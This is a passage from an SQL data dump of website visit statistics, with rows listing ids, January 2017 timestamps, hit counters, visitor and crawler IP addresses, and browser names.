49,1483366641,1,1,0,0,'207.46.13.160','other'),(81250,1483367499,1,1,0,0,'66.249.93.156','chrome'),(81251,1483368267,1,1,0,0,'91.196.178.40','firefox'),(81252,1483368364,1,1,0,0,'130.193.50.34','other'),(81253,1483369026,1,1,0,0,'95.134.202.204','firefox'),(81254,1483371543,1,1,0,0,'78.111.185.248','chrome'),(81255,1483375526,1,1,0,0,'207.46.13.160','other'),(81256,1483375659,1,1,0,0,'78.111.185.248','chrome'),(81257,1483375718,1,1,0,0,'195.46.35.135','chrome'),(81258,1483376068,1,0,1,0,'66.249.75.187',''),(81259,1483376570,1,1,0,0,'94.178.61.227','chrome'),(81260,1483376580,1,1,0,0,'141.8.183.25','other'),(81261,1483377014,1,1,0,0,'66.102.9.25','other'),(81262,1483377339,1,1,0,0,'195.154.181.162','chrome'),(81263,1483377702,1,1,0,0,'163.172.64.224','other'),(81264,1483377832,1,1,0,0,'207.46.13.182','other'),(81265,1483381099,1,1,0,0,'217.69.133.244','other'),(81266,1483384522,1,1,0,0,'91.196.178.39','chrome'),(81267,1483386776,1,0,1,0,'66.249.69.155',''),(81268,1483388477,1,1,0,0,'66.249.75.179','chrome'),(81269,1483390590,1,0,1,0,'66.249.75.183',''),(81270,1483391418,1,1,0,0,'66.102.9.25','other'),(81271,1483391749,1,1,0,0,'163.172.64.193','other'),(81272,1483394603,1,0,1,0,'66.249.75.183',''),(81273,1483394927,1,1,0,0,'157.55.39.78','other'),(81274,1483396669,1,1,0,0,'95.47.56.214','other'),(81275,1483396700,1,1,0,0,'178.255.215.94','other'),(81276,1483397438,1,0,1,0,'66.249.75.179',''),(81277,1483397504,1,1,0,0,'66.249.75.187','chrome'),(81278,1483397801,1,0,1,0,'66.249.75.183',''),(81279,1483398638,1,1,0,0,'207.46.13.182','other'),(81280,1483399338,1,1,0,0,'163.172.64.220','other'),(81281,1483399625,1,0,1,0,'66.249.75.179',''),(81282,1483400175,1,0,1,0,'66.249.75.187',''),(81283,1483402308,1,1,0,0,'180.76.15.147','other'),(81284,1483403984,1,1,0,0,'163.172.64.237','other'),(81285,1483405016,1,0,1,0,'66.249.75.183',''),(81286,1483405499,1,1,0,0,'157.55.39.78','other'),(81287,1483405816,1,1,0,0,'66.102.9.25','other'),(81288,1483406581,1,0,1,0,'66.249.75.179',''),(81289,1483406603,1,1,0,0,'207.46.13.182','other'),(81290,1483408353,1,0,1,0,'66.249.75.183',''),(81291,1483409603,1,0,1,0,'66.249.75.187',''),(81292,1483409921,1,1,0,0,'178.137.83.166','chrome'),(81293,1483410333,1,0,1,0,'66.249.75.183',''),(81294,1483413504,1,0,1,0,'66.249.69.155',''),(81295,1483415507,1,0,1,0,'66.249.75.187',''),(81296,1483415611,1,1,0,0,'66.249.75.183','chrome'),(81297,1483416451,1,0,1,0,'66.249.69.155',''),(81298,1483417566,1,0,1,0,'66.249.75.183',''),(81299,1483418072,1,0,1,0,'68.180.229.190',''),(81300,1483418446,1,0,1,0,'66.249.75.179',''),(81301,1483419271,1,0,1,0,'66.249.75.183',''),(81302,1483419437,1,1,0,0,'163.172.64.187','other'),(81303,1483419746,1,0,1,0,'66.249.75.187',''),(81304,1483420394,1,1,0,0,'66.102.9.29','other'),(81305,1483423498,1,1,0,0,'163.172.64.236','other'),(81306,1483423884,1,0,1,0,'66.249.69.149',''),(81307,1483425686,1,1,0,0,'82.145.220.186','chrome'),(81308,1483425708,1,0,1,0,'66.249.75.179',''),(81309,1483427113,2,2,0,0,'91.196.178.71','chrome'),(81310,1483427427,1,1,0,0,'91.196.178.70','firefox'),(81311,1483427899,1,1,0,0,'91.196.178.66','chrome'),(81312,1483427977,1,1,0,0,'2.92.242.28','msie'),(81313,1483428539,2,2,0,0,'91.196.178.71','chrome'),(81314,1483428773,1,0,1,0,'66.249.75.183',''),(81315,1483428775,2,2,0,0,'185.8.236.222','other'),(81316,1483430315,2,0,2,0,'66.249.75.179',''),(81317,1483430628,1,1,0,0,'207.46.13.160','other'),(81318,1483431096,1,0,1,0,'66.249.75.183',''),(81319,1483431384,1,1,0,0,'213.5.192.30','chrome'),(81320,1483431600,1,1,0,0,'104.45.18.178','other'),(81321,1483432432,1,0,1,0,'66.249.75.187',''),(81322,1483432790,1,1,0,0,'66.249.69.149','chrome'),(81323,1483432841,1,1,0,0,'66.249.75.183','chrome'),(81324,1483432996,1,1,0,0,'91.196.178.133','firefox'),(81325,1483433916,1,1,0,0,'130.193.50.34','other'),(81326,1483433953,1,1,0,0,'91.196.178.71','chrome'),(81327,1483434171,2,0,2,0,'66.249.75.179',''),(81328,1483434309,1,1,0,0,'66.249.69.149','chrome'),(81329,1483434869,1,1,0,0,'93.74.212.147','firefox'),(81330,1483435186,1,1,0,0,'66.102.9.25','other'),(81331,1483435225,1,1,0,0,'78.111.190.154','opera'),(81332,1483435263,1,1,0,0,'178.140.94.87','other'),(81333,1483435912,1,1,0,0,'151.80.44.115','other'),(81334,1483436134,1,1,0,0,'80.91.178.74','other'),(81335,1483436212,1,1,0,0,'193.105.124.46','firefox'),(81336,1483436362,1,1,0,0,'91.196.178.66','firefox'),(81337,1483436818,1,0,1,0,'66.249.69.155',''),(81338,1483437214,1,1,0,0,'78.111.190.154','opera'),(81339,1483437498,1,1,0,0,'95.134.169.140','chrome'),(81340,1483437780,1,1,0,0,'91.196.178.68','chrome'),(81341,1483437863,1,1,0,0,'66.249.93.155','chrome'),(81342,1483437864,1,1,0,0,'91.196.178.40','firefox'),(81343,1483438139,1,1,0,0,'92.112.105.218','firefox'),(81344,1483438319,1,1,0,0,'91.196.177.46','firefox'),(81345,1483438931,1,0,1,0,'66.249.75.183',''),(81346,1483439509,2,0,2,0,'66.249.75.179',''),(81347,1483439592,1,1,0,0,'130.180.217.3','chrome'),(81348,1483440586,1,1,0,0,'91.196.178.71','firefox'),(81349,1483441530,1,0,1,0,'66.249.75.183',''),(81350,1483442351,1,1,0,0,'91.196.178.71','chrome'),(81351,1483442668,1,0,1,0,'66.249.75.187',''),(81352,1483442681,1,1,0,0,'207.46.13.182','other'),(81353,1483443373,1,0,1,0,'66.249.75.183',''),(81354,1483444274,1,1,0,0,'95.133.97.247','firefox'),(81355,1483444290,1,1,0,0,'130.193.51.19','other'),(81356,1483444316,1,1,0,0,'109.173.32.114','msie'),(81357,1483444487,1,1,0,0,'207.46.13.182','other'),(81358,1483444648,1,1,0,0,'163.172.64.229','other'),(81359,1483445148,1,0,1,0,'66.249.75.183',''),(81360,1483445266,1,1,0,0,'91.196.178.67','firefox'),(81361,1483445551,1,0,1,0,'66.249.75.187',''),(81362,1483445620,1,1,0,0,'178.95.211.178','chrome'),(81363,1483445770,1,0,1,0,'66.249.75.179',''),(81364,1483445850,1,1,0,0,'5.165.79.7','chrome'),(81365,1483447196,1,1,0,0,'91.196.178.70','firefox'),(81366,1483448734,1,1,0,0,'178.136.216.252','other'),(81367,1483448944,1,1,0,0,'180.76.15.34','other'),(81368,1483449075,1,1,0,0,'66.102.9.27','other'),(81369,1483449162,2,0,2,0,'66.249.75.179',''),(81370,1483449309,1,1,0,0,'91.196.178.70','firefox'),(81371,1483449387,1,0,1,0,'66.249.75.183',''),(81372,1483449599,1,0,1,0,'66.249.69.149',''),(81373,1483450254,1,1,0,0,'66.249.75.187','chrome'),(81374,1483450533,1,1,0,0,'91.196.178.162','chrome'),(81375,1483450725,1,0,1,0,'66.249.75.183',''),(81376,1483451022,1,1,0,0,'163.172.64.189','other'),(81377,1483451171,1,1,0,0,'91.196.178.40','firefox'),(81378,1483451238,1,1,0,0,'91.196.178.167','chrome'),(81379,1483452366,1,1,0,0,'213.108.75.167','firefox'),(81380,1483452433,1,1,0,0,'163.172.64.199','other'),(81381,1483452462,1,1,0,0,'91.196.177.15','chrome'),(81382,1483452511,1,0,1,0,'66.249.69.155',''),(81383,1483452623,1,0,1,0,'66.249.75.183',''),(81384,1483453291,1,0,1,0,'66.249.75.187',''),(81385,1483453663,1,1,0,0,'92.112.80.49','other'),(81386,1483453907,1,1,0,0,'91.196.178.70','firefox'),(81387,1483454081,1,1,0,0,'178.93.13.111','chrome'),(81388,1483455287,1,1,0,0,'91.196.178.70','firefox'),(81389,1483455574,1,0,1,0,'66.249.75.179',''),(81390,1483455776,1,0,1,0,'66.249.75.187',''),(81391,1483455797,1,1,0,0,'37.73.163.73','other'),(81392,1483456608,2,1,1,0,'66.249.75.183',''),(81393,1483456887,1,1,0,0,'91.196.178.66','firefox'),(81394,1483456896,1,1,0,0,'163.172.64.237','other'),(81395,1483456937,1,1,0,0,'163.172.64.249','other'),(81396,1483457424,2,0,2,0,'66.249.75.187',''),(81397,1483457429,1,1,0,0,'130.180.217.3','chrome'),(81398,1483457441,2,1,1,0,'66.249.75.179',''),(81399,1483457560,2,0,2,0,'66.249.75.183',''),(81400,1483458465,1,0,1,0,'66.249.69.149',''),(81401,1483458521,1,1,0,0,'91.196.178.161','chrome'),(81402,1483458696,1,1,0,0,'95.132.133.199','other'),(81403,1483458862,1,0,1,0,'66.249.75.183',''),(81404,1483459033,1,1,0,0,'195.154.181.15','chrome'),(81405,1483461019,2,1,1,0,'66.249.69.149',''),(81406,1483461346,1,0,1,0,'66.249.69.155',''),(81407,1483461349,2,0,2,0,'66.249.69.152',''),(81408,1483461423,3,0,3,0,'66.249.75.183',''),(81409,1483462278,1,1,0,0,'217.69.133.4','other'),(81410,1483462649,1,0,1,0,'66.249.69.152',''),(81411,1483462661,7,0,7,0,'66.249.69.149',''),(81412,1483463223,1,1,0,0,'37.53.174.145','chrome'),(81413,1483463680,1,1,0,0,'66.102.9.25','other'),(81414,1483463782,1,1,0,0,'91.196.178.39','chrome'),(81415,1483464271,1,1,0,0,'163.172.64.247','other'),(81416,1483464288,1,0,1,0,'66.249.75.179',''),(81417,1483465284,1,1,0,0,'95.135.113.36','chrome'),(81418,1483466238,1,0,1,0,'66.249.69.155',''),(81419,1483466462,1,0,1,0,'66.249.75.179',''),(81420,1483467122,1,1,0,0,'130.180.217.3','chrome'),(81421,1483467183,1,1,0,0,'176.8.173.15','firefox'),(81422,1483467436,1,0,1,0,'66.249.69.152',''),(81423,1483467454,1,1,0,0,'95.133.238.163','chrome'),(81424,1483467469,1,1,0,0,'91.196.178.162','chrome'),(81425,1483467498,1,1,0,0,'91.196.178.71','chrome'),(81426,1483467553,1,0,1,0,'66.249.69.149',''),(81427,1483467661,1,1,0,0,'66.249.75.187','chrome'),(81428,1483468117,4,0,4,0,'66.249.75.179',''),(81429,1483469111,2,0,2,0,'66.249.75.187',''),(81430,1483469188,1,1,0,0,'46.133.205.116','chrome'),(81431,1483469450,1,0,1,0,'66.249.75.183',''),(81432,1483469963,1,1,0,0,'77.91.161.112','other'),(81433,1483470083,1,0,1,0,'66.249.75.187',''),(81434,1483471295,1,1,0,0,'37.146.42.34','chrome'),(81435,1483471794,1,1,0,0,'94.179.50.91','firefox'),(81436,1483472008,1,1,0,0,'66.249.75.187','chrome'),(81437,1483472236,1,0,1,0,'66.249.69.149',''),(81438,1483472439,1,0,1,0,'66.249.75.179',''),(81439,1483472448,1,1,0,0,'46.172.150.251','chrome'),(81440,1483473236,1,0,1,0,'66.249.69.149',''),(81441,1483473334,2,0,2,0,'66.249.75.187',''),(81442,1483473497,1,1,0,0,'92.113.15.16','chrome'),(81443,1483473519,1,1,0,0,'141.8.183.25','other'),(81444,1483473872,1,1,0,0,'130.193.50.34','other'),(81445,1483474171,1,1,0,0,'66.249.69.152','chrome'),(81446,1483474631,1,1,0,0,'157.55.39.78','other'),(81447,1483474706,1,0,1,0,'66.249.75.183',''),(81448,1483474759,1,1,0,0,'46.98.200.133','chrome'),(81449,1483475022,2,0,2,0,'66.249.75.187',''),(81450,1483475023,1,0,1,0,'66.249.75.179',''),(81451,1483475447,1,1,0,0,'176.195.100.223','opera'),(81452,1483476058,1,0,1,0,'66.249.75.187',''),(81453,1483476204,1,0,1,0,'66.249.75.183',''),(81454,1483477387,1,1,0,0,'157.55.39.78','other'),(81455,1483477642,2,0,2,0,'66.249.75.179',''),(81456,1483477706,1,1,0,0,'130.193.51.19','other'),(81457,1483477762,1,0,1,0,'66.249.75.183',''),(81458,1483477857,1,1,0,0,'66.102.9.25','other'),(81459,1483478357,1,0,1,0,'66.249.75.187',''),(81460,1483478582,1,0,1,0,'66.249.75.179',''),(81461,1483479099,2,2,0,0,'136.60.192.226','other'),(81462,1483479626,1,0,1,0,'66.249.75.183',''),(81463,1483479915,2,0,2,0,'66.249.75.179',''),(81464,1483481512,1,1,0,0,'207.46.13.182','other'),(81465,1483482140,1,1,0,0,'163.172.64.246','other'),(81466,1483482296,1,0,1,0,'66.249.69.149',''),(81467,1483482656,1,1,0,0,'141.8.132.10','other'),(81468,1483483214,1,1,0,0,'66.249.75.187','chrome'),(81469,1483484160,1,0,1,0,'66.249.75.183',''),(81470,1483485021,2,0,2,0,'66.249.75.187',''),(81471,1483485538,1,0,1,0,'68.180.228.38',''),(81472,1483485625,2,0,2,0,'66.249.75.183',''),(81473,1483485686,1,0,1,0,'66.249.75.179',''),(81474,1483486980,1,0,1,0,'66.249.75.179',''),(81475,1483487518,1,0,1,0,'66.249.69.155',''),(81476,1483488461,3,0,3,0,'66.249.75.187',''),(81477,1483488466,1,0,1,0,'66.249.75.179',''),(81478,1483490314,1,0,1,0,'66.249.75.187',''),(81479,1483490505,1,0,1,0,'66.249.75.183',''),(81480,1483491851,1,0,1,0,'66.249.75.183',''),(81481,1483492116,1,1,0,0,'109.173.60.201','msie'),(81482,1483492775,1,0,1,0,'66.249.69.155',''),(81483,1483492953,1,1,0,0,'66.102.9.27','other'),(81484,1483493869,1,0,1,0,'66.249.75.179',''),(81485,1483495698,2,0,2,0,'66.249.75.187',''),(81486,1483496343,1,0,1,0,'66.249.75.179',''),(81487,1483496793,1,1,0,0,'66.249.69.149','chrome'),(81488,1483497413,1,0,1,0,'66.249.75.179',''),(81489,1483498189,1,0,1,0,'66.249.75.187',''),(81490,1483498196,1,1,0,0,'207.46.13.160','other'),(81491,1483498313,1,1,0,0,'163.172.64.184','other'),(81492,1483498409,1,0,1,0,'66.249.75.183',''),(81493,1483499364,2,0,2,0,'66.249.75.179',''),(81494,1483499974,1,1,0,0,'157.55.39.78','other'),(81495,1483500936,3,0,3,0,'66.249.75.187',''),(81496,1483504340,1,1,0,0,'163.172.64.254','other'),(81497,1483507094,1,1,0,0,'207.46.13.160','other'),(81498,1483507122,1,1,0,0,'66.102.9.29','other'),(81499,1483510613,1,1,0,0,'178.93.209.165','chrome'),(81500,1483510637,1,1,0,0,'130.193.50.34','other'),(81501,1483510770,1,1,0,0,'91.196.178.37','chrome'),(81502,1483511708,1,0,1,0,'66.249.75.183',''),(81503,1483512060,1,1,0,0,'37.52.125.37','chrome'),(81504,1483512083,2,2,0,0,'130.193.50.34','other'),(81505,1483512297,1,1,0,0,'37.54.94.248','firefox'),(81506,1483513269,1,1,0,0,'91.124.239.124','chrome'),(81507,1483513280,1,1,0,0,'141.8.183.25','other'),(81508,1483513795,1,1,0,0,'91.196.178.66','chrome'),(81509,1483513851,1,1,0,0,'141.8.142.88','other'),(81510,1483514071,1,1,0,0,'141.8.132.30','other'),(81511,1483514200,1,1,0,0,'66.102.9.25','chrome'),(81512,1483515192,1,1,0,0,'91.196.178.70','firefox'),(81513,1483516216,1,1,0,0,'91.196.178.70','firefox'),(81514,1483516633,1,1,0,0,'91.196.177.46','firefox'),(81515,1483517189,1,1,0,0,'91.196.178.71','firefox'),(81516,1483517660,1,1,0,0,'180.76.15.5','other'),(81517,1483517722,1,1,0,0,'82.207.91.234','firefox'),(81518,1483518182,1,1,0,0,'92.112.2.251','chrome'),(81519,1483519313,1,1,0,0,'163.172.64.220','other'),(81520,1483520601,1,0,1,0,'66.249.69.155',''),(81521,1483520829,1,1,0,0,'180.76.15.10','other'),(81522,1483520867,1,1,0,0,'91.196.177.26','chrome'),(81523,1483520960,1,1,0,0,'82.145.220.54','chrome'),(81524,1483520978,2,2,0,0,'130.193.50.34','other'),(81525,1483521387,1,1,0,0,'66.102.9.27','other'),(81526,1483522113,1,0,1,0,'66.249.75.179',''),(81527,1483522387,1,1,0,0,'46.200.35.173','chrome'),(81528,1483522760,1,1,0,0,'91.196.178.67','firefox'),(81529,1483525678,1,0,1,0,'66.249.75.187',''),(81530,1483526387,1,1,0,0,'91.196.178.68','chrome'),(81531,1483526809,1,0,1,0,'66.249.75.187',''),(81532,1483527229,1,1,0,0,'163.172.64.224','other'),(81533,1483529349,1,1,0,0,'91.124.239.124','chrome'),(81534,1483529968,1,1,0,0,'163.172.64.182','other'),(81535,1483530319,1,1,0,0,'178.94.35.95','chrome'),(81536,1483530615,1,1,0,0,'37.55.131.116','opera'),(81537,1483532196,1,0,1,0,'68.180.229.190',''),(81538,1483532999,1,1,0,0,'92.113.17.12','firefox'),(81539,1483533018,1,1,0,0,'130.193.51.19','other'),(81540,1483533951,1,1,0,0,'163.172.64.227','other'),(81541,1483534012,3,3,0,0,'192.187.104.235','other'),(81542,1483534275,1,1,0,0,'91.196.178.65','firefox'),(81543,1483534711,1,1,0,0,'91.196.178.168','firefox'),(81544,1483534933,1,1,0,0,'91.233.49.253','firefox'),(81545,1483536002,1,0,1,0,'66.249.75.187',''),(81546,1483536044,1,1,0,0,'141.8.142.25','other'),(81547,1483536045,1,1,0,0,'66.102.9.27','other'),(81548,1483536152,1,0,1,0,'66.249.69.152',''),(81549,1483537082,1,1,0,0,'93.183.229.159','chrome'),(81550,1483538252,1,1,0,0,'91.124.239.124','chrome'),(81551,1483538917,1,1,0,0,'91.196.178.71','firefox'),(81552,1483539401,1,1,0,0,'91.196.178.68','chrome'),(81553,1483539584,1,1,0,0,'91.196.177.15','chrome'),(81554,1483539841,1,1,0,0,'93.183.229.159','chrome'),(81555,1483540598,1,1,0,0,'94.179.68.33','chrome'),(81556,1483540824,1,1,0,0,'91.196.178.71','firefox'),(81557,1483540867,1,1,0,0,'91.196.178.68','chrome'),(81558,1483541016,1,0,1,0,'66.249.75.183',''),(81559,1483541174,1,1,0,0,'91.196.178.70','firefox'),(81560,1483541510,1,0,1,0,'66.249.75.187',''),(81561,1483542194,1,1,0,0,'91.196.177.46','firefox'),(81562,1483542370,1,1,0,0,'91.196.177.94','chrome'),(81563,1483542531,1,1,0,0,'94.179.246.23','chrome'),(81564,1483542844,1,1,0,0,'195.10.210.49','chrome'),(81565,1483543276,1,1,0,0,'91.196.177.94','chrome'),(81566,1483543814,1,1,0,0,'193.33.206.65','chrome'),(81567,1483544439,1,1,0,0,'178.214.193.202','chrome'),(81568,1483545454,1,1,0,0,'195.10.210.49','chrome'),(81569,1483546221,2,2,0,0,'91.196.178.104','msie'),(81570,1483547927,1,1,0,0,'130.180.218.138','chrome'),(81571,1483548770,1,1,0,0,'46.211.24.125','other'),(81572,1483548837,1,1,0,0,'91.201.244.3','chrome'),(81573,1483548848,1,1,0,0,'163.172.64.216','other'),(81574,1483549801,1,1,0,0,'195.154.181.162','chrome'),(81575,1483550145,1,1,0,0,'180.76.15.153','other'),(81576,1483550743,1,0,1,0,'66.249.75.183',''),(81577,1483550748,1,1,0,0,'66.102.9.25','other'),(81578,1483550758,2,0,2,0,'66.249.75.179',''),(81579,1483552924,49,49,0,0,'209.190.113.85','other'),(81580,1483553910,1,1,0,0,'163.172.64.192','other'),(81581,1483553951,10,10,0,0,'209.190.113.85','other'),(81582,1483556612,1,1,0,0,'37.53.110.157','chrome'),(81583,1483557247,1,1,0,0,'163.172.64.183','other'),(81584,1483557653,1,1,0,0,'91.196.178.33','chrome'),(81585,1483558124,1,0,1,0,'66.249.75.179',''),(81586,1483558162,1,0,1,0,'66.249.75.183',''),(81587,1483559129,1,1,0,0,'163.172.64.253','other'),(81588,1483561571,1,1,0,0,'176.98.69.170','chrome'),(81589,1483561624,1,1,0,0,'130.180.217.197','chrome'),(81590,1483561693,1,0,1,0,'66.249.75.179',''),(81591,1483562348,1,1,0,0,'163.172.64.248','other'),(81592,1483564424,1,1,0,0,'163.172.64.180','other'),(81593,1483565112,1,1,0,0,'66.102.9.29','other'),(81594,1483566160,1,0,1,0,'66.249.69.155',''),(81595,1483566252,1,1,0,0,'180.76.15.34','other'),(81596,1483567240,1,1,0,0,'91.242.194.239','other'),(81597,1483569339,1,0,1,0,'66.249.75.179',''),(81598,1483571549,1,1,0,0,'162.210.196.130','other'),(81599,1483571631,1,1,0,0,'163.172.64.188','other'),(81600,1483572029,1,1,0,0,'178.255.215.94','other'),(81601,1483574314,1,1,0,0,'157.55.39.51','other'),(81602,1483575587,1,0,1,0,'66.249.69.149',''),(81603,1483577231,2,0,2,0,'66.249.69.152',''),(81604,1483577543,1,0,1,0,'66.249.69.155',''),(81605,1483578098,1,1,0,0,'163.172.64.227','other'),(81606,1483578350,1,0,1,0,'66.249.75.187',''),(81607,1483579101,1,1,0,0,'66.102.9.25','other'),(81608,1483579830,1,1,0,0,'62.210.162.42','chrome'),(81609,1483580449,2,0,2,0,'66.249.75.187',''),(81610,1483581347,1,0,1,0,'66.249.75.183',''),(81611,1483581382,1,0,1,0,'66.249.75.179',''),(81612,1483582147,1,1,0,0,'163.172.64.249','other'),(81613,1483583779,2,0,2,0,'66.249.75.179',''),(81614,1483583853,1,0,1,0,'66.249.75.187',''),(81615,1483586552,1,0,1,0,'66.249.75.179',''),(81616,1483587356,1,1,0,0,'66.249.69.152','chrome'),(81617,1483591012,1,0,1,0,'66.249.75.187',''),(81618,1483591866,2,2,0,0,'163.172.68.121','other'),(81619,1483592548,1,0,1,0,'66.249.75.187',''),(81620,1483592627,1,1,0,0,'141.8.142.58','other'),(81621,1483592696,1,1,0,0,'141.8.142.61','other'),(81622,1483592941,1,0,1,0,'66.249.69.155',''),(81623,1483593409,1,1,0,0,'66.102.9.29','other'),(81624,1483593606,1,0,1,0,'66.249.75.187',''),(81625,1483594695,4,4,0,0,'130.193.51.19','other'),(81626,1483594746,1,0,1,0,'66.249.75.183',''),(81627,1483595058,1,1,0,0,'91.196.178.65','firefox'),(81628,1483595161,2,2,0,0,'141.8.183.25','other'),(81629,1483595236,1,1,0,0,'130.193.50.34','other'),(81630,1483595953,1,0,1,0,'66.249.75.179',''),(81631,1483595970,1,1,0,0,'207.46.13.182','other'),(81632,1483595979,1,1,0,0,'163.172.64.178','other'),(81633,1483596920,1,0,1,0,'66.249.75.179',''),(81634,1483597381,1,1,0,0,'91.196.178.66','firefox'),(81635,1483597725,1,1,0,0,'91.196.177.94','chrome'),(81636,1483599669,1,1,0,0,'91.196.178.71','chrome'),(81637,1483599805,1,1,0,0,'66.102.9.29','chrome'),(81638,1483600874,1,1,0,0,'141.8.183.25','other'),(81639,1483601008,1,1,0,0,'163.172.64.237','other'),(81640,1483601652,1,0,1,0,'66.249.69.149',''),(81641,1483603512,1,1,0,0,'91.196.178.161','chrome'),(81643,1483604098,1,1,0,0,'95.132.111.96','chrome'),(81644,1483604680,1,1,0,0,'141.8.183.25','other'),(81645,1483604906,1,1,0,0,'95.133.76.145','other'),(81646,1483605770,1,1,0,0,'163.172.64.183','other'),(81647,1483606060,2,2,0,0,'82.207.91.234','firefox'),(81648,1483606075,1,1,0,0,'91.196.177.26','chrome'),(81649,1483606164,1,1,0,0,'130.193.51.19','other'),(81650,1483606458,1,1,0,0,'91.124.113.55','chrome'),(81651,1483606469,1,1,0,0,'141.8.142.67','other'),(81652,1483607255,1,1,0,0,'91.196.177.46','firefox'),(81653,1483607329,1,1,0,0,'130.193.51.19','other'),(81654,1483607471,1,0,1,0,'66.249.75.183',''),(81655,1483607617,1,1,0,0,'141.8.183.25','other'),(81656,1483607809,1,1,0,0,'66.102.9.25','other'),(81657,1483608584,1,1,0,0,'46.201.0.132','firefox'),(81658,1483608608,1,1,0,0,'163.172.64.242','other'),(81659,1483609075,1,1,0,0,'37.53.228.130','firefox'),(81660,1483609088,1,1,0,0,'180.76.15.24','other'),(81661,1483609726,1,1,0,0,'91.196.178.66','chrome'),(81662,1483609800,1,1,0,0,'66.249.93.155','chrome'),(81663,1483609854,1,1,0,0,'95.132.154.106','chrome'),(81664,1483610016,1,1,0,0,'163.172.64.247','other'),(81665,1483611168,2,0,2,0,'66.249.75.183',''),(81666,1483611348,1,1,0,0,'91.196.177.94','chrome'),(81667,1483612099,1,0,1,0,'66.249.75.187',''),(81668,1483612272,1,1,0,0,'91.196.177.94','chrome'),(81669,1483612323,1,1,0,0,'46.201.0.132','firefox'),(81670,1483612557,1,1,0,0,'163.172.64.216','other'),(81671,1483613236,1,1,0,0,'82.207.39.77','firefox'),(81672,1483613250,1,1,0,0,'141.8.142.61','other'),(81673,1483613728,1,1,0,0,'66.249.75.187','chrome'),(81674,1483613750,2,2,0,0,'66.249.75.179','chrome'),(81675,1483613862,1,1,0,0,'66.249.75.183','chrome'),(81676,1483614084,1,0,1,0,'66.249.69.152',''),(81677,1483614188,1,1,0,0,'95.135.19.189','chrome'),(81678,1483614259,1,1,0,0,'91.196.178.97','chrome'),(81679,1483614915,1,1,0,0,'130.193.50.34','other'),(81680,1483614920,1,1,0,0,'40.77.167.14','other'),(81681,1483614951,4,4,0,0,'141.8.183.25','other'),(81682,1483614984,1,1,0,0,'141.8.142.67','other'),(81683,1483615014,1,1,0,0,'163.172.64.180','other'),(81685,1483615045,3,3,0,0,'130.193.51.19','other'),(81686,1483615135,3,3,0,0,'141.8.142.58','other'),(81687,1483615185,40,40,0,0,'208.43.225.84','other'),(81688,1483615269,1,1,0,0,'130.193.50.4','other'),(81689,1483615345,1,1,0,0,'78.154.164.237','chrome'),(81690,1483615440,1,1,0,0,'92.113.3.192','chrome'),(81691,1483615479,1,1,0,0,'93.158.152.40','other'),(81692,1483616435,1,1,0,0,'37.55.208.51','chrome'),(81693,1483616443,1,1,0,0,'130.193.50.6','other'),(81694,1483616526,1,1,0,0,'91.224.69.12','firefox'),(81695,1483616544,1,1,0,0,'130.193.51.19','other'),(81696,1483616772,1,1,0,0,'91.196.178.40','firefox'),(81697,1483618023,1,1,0,0,'163.172.64.223','other'),(81698,1483619042,1,1,0,0,'66.249.69.152','chrome'),(81699,1483619069,2,1,1,0,'66.249.69.149',''),(81700,1483619210,2,2,0,0,'141.8.183.25','other'),(81701,1483619264,2,2,0,0,'130.193.51.19','other'),(81702,1483619372,1,1,0,0,'141.8.142.67','other'),(81703,1483619480,1,1,0,0,'91.196.178.70','firefox'),(81704,1483619515,1,1,0,0,'95.132.154.106','chrome'),(81705,1483620291,1,1,0,0,'180.76.15.146','other'),(81706,1483620943,1,1,0,0,'130.193.50.34','other'),(81707,1483621038,1,1,0,0,'82.207.127.234','firefox'),(81708,1483621133,1,1,0,0,'163.172.64.180','other'),(81709,1483621183,2,2,0,0,'195.154.181.162','chrome'),(81710,1483621493,1,1,0,0,'91.196.178.71','firefox'),(81711,1483621607,1,1,0,0,'82.207.91.234','firefox'),(81712,1483621703,1,1,0,0,'46.211.113.170','chrome'),(81713,1483621828,1,1,0,0,'46.201.241.60','firefox'),(81714,1483621838,1,1,0,0,'95.132.12.45','firefox'),(81715,1483621853,1,1,0,0,'141.8.142.58','other'),(81716,1483622410,1,1,0,0,'66.102.9.29','other'),(81717,1483622486,1,1,0,0,'192.166.132.216','chrome'),(81718,1483622626,1,1,0,0,'130.193.51.19','other'),(81719,1483622660,2,2,0,0,'91.196.178.70','firefox'),(81720,1483622699,3,3,0,0,'141.8.183.25','other'),(81721,1483623181,1,1,0,0,'37.229.199.226','chrome'),(81722,1483623207,1,1,0,0,'82.207.91.234','firefox'),(81723,1483623523,1,1,0,0,'37.54.18.34','chrome'),(81724,1483624132,2,2,0,0,'91.196.177.46','firefox'),(81725,1483624286,1,1,0,0,'37.54.36.40','chrome'),(81726,1483624588,1,1,0,0,'91.196.178.70','firefox'),(81727,1483624778,1,1,0,0,'95.133.177.122','firefox'),(81728,1483624794,1,1,0,0,'130.193.50.34','other'),(81729,1483625824,2,2,0,0,'91.196.178.66','chrome'),(81730,1483625932,1,1,0,0,'66.249.75.183','chrome'),(81731,1483625964,1,1,0,0,'91.196.178.70','firefox'),(81732,1483626114,1,0,1,0,'66.249.75.179',''),(81733,1483626902,1,0,1,0,'66.249.69.149',''),(81734,1483627324,1,1,0,0,'141.8.132.79','other'),(81735,1483627371,1,1,0,0,'141.8.142.62','other'),(81736,1483627374,1,1,0,0,'5.255.253.36','other'),(81737,1483627960,1,1,0,0,'91.196.178.68','firefox'),(81738,1483628361,1,1,0,0,'46.201.241.60','firefox'),(81739,1483628616,1,1,0,0,'91.196.178.71','msie'),(81740,1483628844,1,1,0,0,'66.249.66.202','chrome'),(81741,1483629169,1,0,1,0,'66.249.76.27',''),(81742,1483629572,1,1,0,0,'66.249.76.28','chrome'),(81743,1483629738,1,1,0,0,'91.196.178.162','chrome'),(81744,1483630229,1,1,0,0,'91.233.48.203','chrome'),(81745,1483630297,1,1,0,0,'163.172.64.225','other'),(81746,1483630509,1,1,0,0,'91.124.180.56','chrome'),(81747,1483630894,1,1,0,0,'130.193.51.19','other'),(81748,1483630948,2,2,0,0,'141.8.142.58','other'),(81749,1483630996,1,1,0,0,'141.8.183.19','other'),(81750,1483631298,1,1,0,0,'91.196.178.66','chrome'),(81751,1483631314,1,0,1,0,'66.249.76.109',''),(81752,1483632018,1,0,1,0,'66.249.76.29',''),(81753,1483632391,1,1,0,0,'180.76.15.153','other'),(81754,1483633425,1,1,0,0,'130.193.51.19','other'),(81755,1483633479,1,1,0,0,'130.193.50.34','other'),(81756,1483633587,1,1,0,0,'141.8.142.61','other'),(81757,1483633645,1,1,0,0,'93.158.152.84','other'),(81758,1483633649,1,1,0,0,'141.8.142.67','other'),(81759,1483634025,1,0,1,0,'66.249.66.202',''),(81760,1483635061,1,1